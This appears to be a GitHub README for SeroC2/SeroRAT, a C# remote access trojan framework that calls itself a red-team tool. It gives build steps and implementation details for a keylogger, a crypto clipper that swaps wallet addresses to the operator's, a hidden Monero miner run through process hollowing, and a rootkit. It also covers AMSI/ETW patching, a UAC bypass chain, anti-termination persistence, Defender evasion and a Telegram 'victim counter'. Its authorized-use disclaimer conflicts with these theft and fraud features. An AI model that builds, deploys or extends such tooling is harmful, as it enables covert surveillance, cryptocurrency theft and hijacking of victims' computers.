A Command & Control framework for authorized red team engagements and security research

SeroRAT is a modular C2 framework written in C# featuring a WPF server and a hardened NativeAOT client stub. It combines multi-vector persistence, advanced anti-analysis protections, a polymorphic crypter (closed-source), and encrypted TLS communication.

⚠️ For authorized use only. See Legal Notice.

Dashboard	Builder

git clone https://github.com/SeroSkiid/SeroC2
cd SeroC2
setup.bat          :: installs .NET SDK + VS Build Tools (run as Admin)
build.bat          :: release (dist folder)

You can also open Sero.sln in Visual Studio 2026, build (F6), and launch SeroServer.exe.

Configure and build the client stub from the Builder tab.

Miner module: Download xmrig and place xmrig.exe inside xmrig-release/. The miner builder will embed and encrypt it automatically.

• Remote Desktop
• Remote Webcam
• HVNC
• File Manager
• Keylogger
• Crypto Clipper
• Process Manager
• RunPE / Process Hollowing
• Network Architecture
• How to Compile
• Project Structure
• Roadmap
• Legal Notice

1. Right-click a client → Remote Desktop
2. Adjust Quality (1–100) and Resolution (%) sliders
3. Click Start — live feed appears in the viewer
4. Interact directly: click, type, scroll, clipboard sync
5. Click Stop to end the session

Primary — DXGI Desktop Duplication (IDXGIOutput1::DuplicateOutput):

• GPU-direct capture via the DWM compositor — no CPU copies
• Blocks on AcquireNextFrame(timeout=16ms) aligned to VBLANK — natural 60 fps pacing

Fallback — GDI BitBlt (GetDC + BitBlt):

• Works on RDP sessions, headless machines, non-BGRA GPU formats
• Multi-monitor aware via EnumDisplayMonitors

Delta compression — 64×64 block diff:

• Only changed blocks are encoded and transmitted
• Below 15% change → quality boosted to 95 for sharp text
• Above threshold → full frame sent instead

Input injection via SendInput: mouse + keyboard (virtual key codes + extended key flag)

1. Right-click a client → Remote Webcam
2. Select a device from the dropdown
3. Adjust Quality and FPS → click Start

Primary — DirectShow (COM, pure P/Invoke):

• Device enumeration: ICreateDevEnum + CLSID_VideoInputDeviceCat
• Capture graph: ICaptureGraphBuilder2 + ISampleGrabber targeting RGB24 or YUY2
• JPEG encode: raw pixels → GDI+ GdipSaveImageToStream

Fallback — VFW (avicap32.dll):

• capCreateCaptureWindow + WM_CAP_* messages
• [UnmanagedCallersOnly] frame callback — no delegate allocation per frame

Hidden Virtual Desktop — creates an isolated Windows session invisible to the user.

1. Right-click a client → HVNC
2. Use the browser launcher buttons (Explorer, Chrome, Firefox, Edge, Brave, Opera, Opera GX, Telegram, Discord) for instant stealth sessions
3. Full mouse + keyboard input injection on the hidden desktop

Full remote file system browser with icon-per-extension UI.

• Navigate — browse drives, directories, double-click to enter
• GoTo shortcuts — Desktop, User Folder, Temp, AppData, Startup
• Download / Upload — single file up/down
• Execute — Normal, Hidden, or As Admin
• Rename / Delete / New Folder
• SHA-256 Hash — computed on client, copied to clipboard
• Show / Hide — toggle hidden file attribute
• Set as Wallpaper — set any image as desktop background
• Play Music — open audio file with default player
• 7-Zip compress — zip via PowerShell Compress-Archive
• Download from URL — pull file from internet directly to client

Lists all active TCP connections (PID, process name, local/remote address, state). Force-close connections via SetTcpEntry(DELETE_TCB). Block IP and Block Port toolbar buttons create Windows Firewall rules (inbound + outbound) for the selected connection.

Enumerates and deletes startup entries from:

• Registry HKCU\Run / HKLM\Run / RunOnce
• User and Common Startup folders (.lnk)
• Scheduled Tasks (via schtasks /query)
• WMI Event Subscriptions (__EventFilter, CommandLineEventConsumer, __FilterToConsumerBinding)

Each entry shows an Authenticode verification status (Verified / Not Verified) with publisher name, checked via WinVerifyTrust. Unverified entries are highlighted in red (like Autoruns).

Real-time audio capture using WaveIn (WinMM):

• Device enumeration and selection
• Live waveform visualization (bar graph, 50 ms refresh)
• Buffered PCM stream (16-bit, 16 kHz, mono)
• Save as WAV — proper WAV header written to disk

Interactive prank / control panel:

Low-level global keyboard hook using WH_KEYBOARD_LL — invisible to the user, captures all keystrokes system-wide.

• Window-title headers — each context switch is logged with the app name and UTC timestamp
• Auto-sync — server pulls buffered logs every 10 seconds while capturing
• Manual get / clear — request logs on demand or wipe the buffer on client
• Save as TXT — export the full log from the server UI

The stub installs a low-level keyboard hook via SetWindowsHookEx(WH_KEYBOARD_LL). The hook callback ([UnmanagedCallersOnly], NativeAOT-safe) converts VK codes to characters using ToUnicode with the current keyboard layout (handles international keyboards, Shift, CapsLock). The log is buffered in memory and capped at 512 KB; the server drains and displays it in a scrollable monospace text area.

Silently monitors the clipboard and replaces detected crypto addresses with your own.

BTC · ETH/BNB · LTC · TRX · SOL · XMR · XRP · DASH · BCH

• Per-coin addresses — configure a replacement address for each currency independently
• Detection log — every replacement is logged to the server UI with timestamp, coin type, and truncated original address
• Live counter — total replacements shown in the server window
• Enable / disable — toggle without reconnecting; state persists until changed

The stub polls the clipboard every ~450 ms using native Win32 OpenClipboard / GetClipboardData / SetClipboardData (no Windows Forms dependency, fully NativeAOT-compatible). Detected addresses are matched against regex patterns and replaced atomically. A real-time notification is sent to the server via ClipperDetected packet so the operator sees every swap instantly.

Live view of all running processes on the target with native Windows shell icons.

• Process list — name, PID, working-set memory, main window title
• Native icons — shell icon extracted from the process EXE via SHGetFileInfo
• Search — filter by name or window title in real time
• Suspend / Resume / Kill — right-click context menu
• Refresh — manual refresh button

Full in-memory PE injection pipeline, NativeAOT-compatible.

Pipeline:

1. CreateProcess(..., CREATE_SUSPENDED | DETACHED_PROCESS) against a configurable host (svchost.exe, dllhost.exe, …)
2. PPID Spoofing — UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_PARENT_PROCESS): injected process appears as child of explorer.exe (user) or winlogon.exe (admin)
3. NtUnmapViewOfSection → VirtualAllocEx + WriteProcessMemory + base relocations
4. IAT fixup — walks the import directory, resolves each DLL/function via GetProcAddress
5. SetThreadContext sets RCX = EntryPoint + ImageBase → ResumeThread

Credit — RunPE originally authored by Hydra48 (process-hollowing-24h2), converted to C#/NativeAOT by SeroSkiid.

Native DLL plugins compiled on-demand and delivered in-process. Only disk artifact is the temp DLL, deleted after execution. Cached by source hash.

The stub copies itself to %AppData%\Roaming\<PersistName>\<HiddenFileName>.

Watchdog: file lock on installed exe + backup, FileSystemWatcher instant restore, 5-second polling fallback, isolated PPID-spoofed persistence worker (breaks Defender Persistence.A!ml correlation).

• DACL — ACE DENY PROCESS_TERMINATE + PROCESS_SUSPEND_RESUME for Everyone — blocks Task Manager and all tools without SeDebugPrivilege
• 4 guardian processes in dllhost.exe / SearchProtocolHost.exe / SearchFilterHost.exe with PPID spoofing, staggered 800ms apart

The crypter / loader / UAC bypass is closed-source and NOT included in this repository.

The builder generates a polymorphic native C++ loader that encrypts and launches the stub in memory.

UAC Bypass: SilentCleanup windir-hijack → scheduled task → CMSTP INF → EventVwr → WsReset → Sdclt → ComputerDefaults → Fodhelper — non-registry methods tried first
SYSTEM Elevation: SeDebugPrivilege → winlogon.exe token duplication → CreateProcessWithTokenW

Encryption pipeline:

1. LZNT1 compression via ntdll!RtlCompressBuffer
2. AES-256-CBC with random per-build key/IV embedded as RCDATA resource
3. SFC64 stream cipher — resource payload encoding (1:1 ratio, 32-byte random seed per build)

Polymorphism: per-build random AES key split across 3 binary locations, random 8-byte magic signature, unique BuildId GUID, random junk function names and shuffled call order.

AMSI + ETW Bypass: ETW patched first (EtwEventWrite) then AMSI (AmsiScanBuffer) via NtWriteVirtualMemory; 4-byte push 0; pop eax; ret patch, XOR-obfuscated per build.

• TLS 1.2+ with SHA-256 certificate pinning
• Shared-key authentication verified on every connection
• 3-second heartbeat + RTT measurement (ping/pong)
• Auto-reconnect with configurable delay (default 5s), multi-host round-robin

Packet format: 4-byte little-endian length prefix + UTF-8 JSON body. Max 100 MB per packet, 60-second read timeout.

Standalone Monero mining module, fully separate from the main RAT stub.

Features:

• Embeds xmrig at build time — SFC64 stream cipher + Deflate compression (random seed per build)
• Native TLS — scans xmrig in memory for the OpenSSL marker at runtime; if found, passes --tls directly on the command line (no proxy, no config file); falls back to a loopback TLS-terminating proxy for builds without OpenSSL
• CLI-arg launch — all pool parameters (-o, -u, -p, -a, --tls, --randomx-no-rdmsr) are passed on the command line; no config.json dependency for the pool connection
• Process hollowing — xmrig runs inside a legitimate svchost.exe via NtCreateSection/NtMapViewOfSection; no xmrig file touches disk during mining
• PPID spoofing — hollowed process appears as a child of explorer.exe
• Idle throttle — full CPU when idle, drops to active limit when user is at the machine
• Stealth — kills hollowed xmrig if Process Explorer / Task Manager / Process Hacker is detected; restarts cleanly when they close
• Watchdog — in-process file integrity watchdog (FileSystemWatcher + polling), backup copy, named-event clean exit; persistence restore only runs when EnableStartup=true
• SafeBoot persistence — optional service registered in SafeBoot registry keys
• Stats server — optional lightweight HTTP dashboard (token-protected)
• BotKiller — kills competing miners on startup and every 30 s

Setup: place xmrig.exe (with OpenSSL) in xmrig-release/ before building.

Prerequisites:

• .NET 10 SDK
• Visual Studio 2022 with Desktop development with C++ workload
• Windows SDK 10.0.22621+

setup.bat

Run as Administrator — installs everything via winget (.NET SDK, VS Build Tools 2022 with MSVC + Windows SDK).

build.bat

Produces dist\SeroServer.exe (self-contained, no .NET runtime required on target).

Or open Sero.sln in Visual Studio 2022 and press F6.

1. Launch SeroServer.exe
2. Go to the Builder tab
3. Configure hosts, auth key, persistence, hollow target
4. Click Build — the stub is compiled with NativeAOT and optionally crypted

1. Place xmrig.exe (with OpenSSL support) in xmrig-release/
2. In the server, go to Builder → XMR tab
3. Fill wallet, pool, CPU limits
4. Click Build Miner

Optional — UPX compression (8 MB → 2.4 MB):

Download upx.exe (Windows x64) and place it either:

• in your PATH, or
• in a tools/ folder next to SeroServer.exe

Then tick UPX compression in the Builder before clicking Build. The tools/ folder is gitignored — the binary stays local.

Troubleshooting:

• cl.exe (MSVC) missing → run setup.bat
• vswhere.exe not found → add C:\Program Files (x86)\Microsoft Visual Studio\Installer to PATH
• NativeAOT requires win-x64 RID — do not mix in wasm workloads
• UPX not found → see above

SeroC2/
├── server/                        # C2 Server (WPF · .NET 10)
│   ├── UI/                        # Windows
│   │   ├── ServerWindow.*         # Main dashboard + builder
│   │   ├── RemoteDesktopWindow.*  # RDP viewer
│   │   ├── HvncWindow.*           # HVNC viewer
│   │   ├── WebcamWindow.*         # Webcam viewer
│   │   ├── RemoteShellWindow.*    # Interactive shell
│   │   ├── FileManagerWindow.*    # Remote file browser
│   │   ├── TcpManagerWindow.*     # TCP connection manager
│   │   ├── StartupManagerWindow.* # Startup entries manager
│   │   ├── MicrophoneWindow.*     # Microphone capture + waveform + live listen
│   │   ├── FunWindow.*            # Fun / prank controls
│   │   ├── KeyloggerWindow.*      # Keylogger viewer
│   │   ├── CryptoClipperWindow.*  # Crypto clipper config + detection log
│   │   └── ClientLogWindow.*      # Per-client activity log
│   ├── Builder/                   # Build pipeline (config gen, NativeAOT, crypter bridge)
│   ├── Net/                       # TLS server + certificate + Discord RPC
│   ├── Data/                      # JSON datastore, client records, autotask queue
│   ├── Protocol/                  # Packet protocol + all data classes
│   └── SeroServer.csproj
│
├── stub/                          # Client stub (.NET 10 · NativeAOT)
│   ├── Program.cs                 # Entry point + protection init
│   ├── TlsClient.cs               # TLS client + full command dispatch
│   ├── Protection.cs              # Anti-analysis + guardian watchdog + Defender exclusion (registry P/Invoke)
│   ├── Persistence.cs             # Registry + Startup + Task + file watchdog
│   ├── TelegramNotifier.cs        # First-exec Telegram notification
│   ├── RemoteDesktopFeature.cs    # DXGI + GDI BitBlt, 64×64 block diff
│   ├── DxgiCapture.cs             # DXGI Desktop Duplication
│   ├── WebcamFeature.cs           # DirectShow SampleGrabber
│   ├── WebcamDShow.cs             # VFW avicap32 fallback
│   ├── HvncFeature.cs             # Hidden virtual desktop
│   ├── FileManagerFeature.cs      # Remote file system operations
│   ├── TcpManagerFeature.cs       # TCP table + force-close
│   ├── StartupManagerFeature.cs   # Startup enumeration + deletion
│   ├── MicrophoneFeature.cs       # WaveIn PCM capture
│   ├── FunFeature.cs              # Fun commands (TTS, msgbox, screen, etc.)
│   ├── KeyloggerFeature.cs        # WH_KEYBOARD_LL hook, offline disk logging (by date)
│   ├── CryptoClipperFeature.cs    # Clipboard monitoring + crypto address swap
│   ├── ProcessManagerFeature.cs   # Process enumeration + kill
│   ├── TikTokFeature.cs           # TikTok comment API (video + livestream)
│   ├── TikTokCdpFeature.cs        # Chrome DevTools Protocol auto-signup (no HVNC, minimal TCP WS)
│   ├── Socks5Feature.cs           # Reverse SOCKS5 relay
│   ├── ProcessHollowing.cs        # RunPE + PPID spoofing
│   ├── Rootkit.cs                 # Reflective hook DLL injection
│   ├── Config.cs                  # ⚠️ AUTO-GENERATED by builder (no secrets in repo)
│   └── SeroStub.csproj
│
├── miner-stub/                    # XMR miner stub (.NET 10 · NativeAOT)
│   ├── Program.cs                 # Miner main loop + TLS proxy
│   ├── MinerConfig.cs             # ⚠️ AUTO-GENERATED by builder (no secrets in repo)
│   └── MinerStub.csproj
│
├── miner-uninstaller/             # Silent miner removal utility
├── stats-server/                  # Lightweight HTTP stats dashboard
│
├── hook/                          # User-mode rootkit (Microsoft Detours)
│   └── hook/
│       ├── dllmain.cpp            # NtQuerySystemInformation, NtQueryDirectoryFile hooks
│       └── ReflectiveDllMain.cpp  # Reflective PE loader (PEB walk, no imports)
│
├── setup.bat                      # Prerequisite installer (run as Admin)
├── setup-prerequisites.ps1        # winget automation (.NET SDK + VS Build Tools)
├── build.bat                      # Quick build launcher
├── build.ps1                      # Self-contained server publish to dist/
├── start_stats.bat                # Launch stats server (fill TOKEN before use)
└── Sero.sln

Not included in this repository (closed-source):

• Native C++ loader / crypter
• UAC bypass implementation
• xmrig-release/xmrig.exe — download separately from xmrig/xmrig

• Remote Desktop — DXGI + GDI, 64×64 block diff, multi-monitor
• Remote Webcam — DirectShow SampleGrabber + VFW fallback
• HVNC — hidden virtual desktop, browser launchers (Chrome, Edge, Firefox, Brave, Opera…)
• Remote Shell — interactive cmd / PowerShell
• File Manager — browse, download, upload, exec, hash, wallpaper, 7-zip
• TCP Manager — list connections, force-close via SetTcpEntry
• Startup Manager — Registry Run / RunOnce, Startup folder, Scheduled Tasks, WMI Event Subscriptions, Authenticode signature + publisher (red highlight for unsigned entries)
• Microphone — WaveIn capture, live server playback, save WAV
• Fun panel — CD-ROM, taskbar, screen, TTS, crazy mouse, screen rotation…
• XMR Miner — NativeAOT, process hollowing, idle throttle, OpenSSL TLS
• Telegram notification — first-exec, HWID dedup, global victim counter
• AutoTask plugins — native C++ DLL compiled on-demand, cached by hash
• Multi-host + auto-reconnect — round-robin, configurable delay
• Keylogger — WH_KEYBOARD_LL, window-title headers, offline disk logging by date, file browser UI, download/delete log files
• Crypto Clipper — BTC / ETH / BNB / LTC / TRX / SOL / XMR / XRP / DASH / BCH, global server tab, auto-push on connect
• Process Manager — real-time list, CPU/RAM heat-map (blue→orange→red), suspend/resume/kill via right-click, native icons, search filter; Live button removed (on-demand refresh)
• Service Manager — list all services via sc.exe query, start/stop/restart/disable/delete via right-click (admin required for write operations)
• Window Manager — EnumWindows P/Invoke, show/hide/focus/restore/minimize/maximize/close/kill per HWND, right-click actions
• Registry Editor — browse sub-keys, read/write/delete values and keys, admin warning popup when client not elevated (admin required for HKLM writes)
• Installed Programs — HKLM+HKCU Uninstall registry enumeration, trigger UninstallString silently, right-click actions
• Device Manager — SetupAPI enumeration (no WMI), uninstall device by instance ID, right-click actions
• TCP Connections — toolbar Block IP / Block Port buttons (netsh advfirewall), force-close via SetTcpEntry, right-click close/kill
• Fun panel toggle feedback — Show/Hide button pairs highlight the active state (white + blue left accent = active, heavily dimmed = inactive partner); screen rotation shows current angle
• Offline clients RAM column — LastRamDisplay shown in the offline clients grid
• All feature windows — fullscreen (maximize/restore) button; drag blocked when maximized
• CPU/RAM telemetry — GetSystemTimes + GlobalMemoryStatusEx sampling every ~15 s, displayed as columns in client list with color-coded brush
• Reverse SOCKS5 proxy — tunnel traffic through the remote machine, local SOCKS5 listener
• TikTok Bot — multi-client panel: CDP session detection (navigates to tiktok.com and reads Chrome cookies via Network.getCookies — skips signup if session exists), CDP auto-signup via Google OAuth (Chrome hidden, no HVNC), account inventory, comment broadcast with rotation across all accounts; cookie auto-flows from signup to comment panel, post comments on videos and livestreams using an existing session
• Stub size — 8.00 MB NativeAOT / 2.36 MB with UPX --best --lzma (all features incl. Keylogger, Crypto Clipper, Telegram notify)
• Polymorphic Crypter — AES-256-CBC, LZNT1, AMSI+ETW bypass (closed-source)
• UAC Bypass chain — computerdefaults → fodhelper → sdclt → mmc (closed-source)
• Rootkit — reflective DLL, NtQuerySystemInformation / NtQueryDirectoryFile hooks

• SeroSkiid — Lead developer
• Hydra48 — Original RunPE C++ implementation (process-hollowing-24h2), converted to C#/NativeAOT by SeroSkiid

This framework is provided for educational purposes and authorized security testing only.

Permitted: red team engagements with written client authorization · penetration testing under a formal contract · academic security research · defensive analysis of internal environments

Prohibited: deployment without explicit system owner consent · data exfiltration · cyberattacks or service disruption · any illegal or malicious activity

Users are solely responsible for compliance with applicable laws in their jurisdiction. The developer is not responsible for misuse.

SeroC2 is licensed under the MIT License.

Developed by SeroSkiid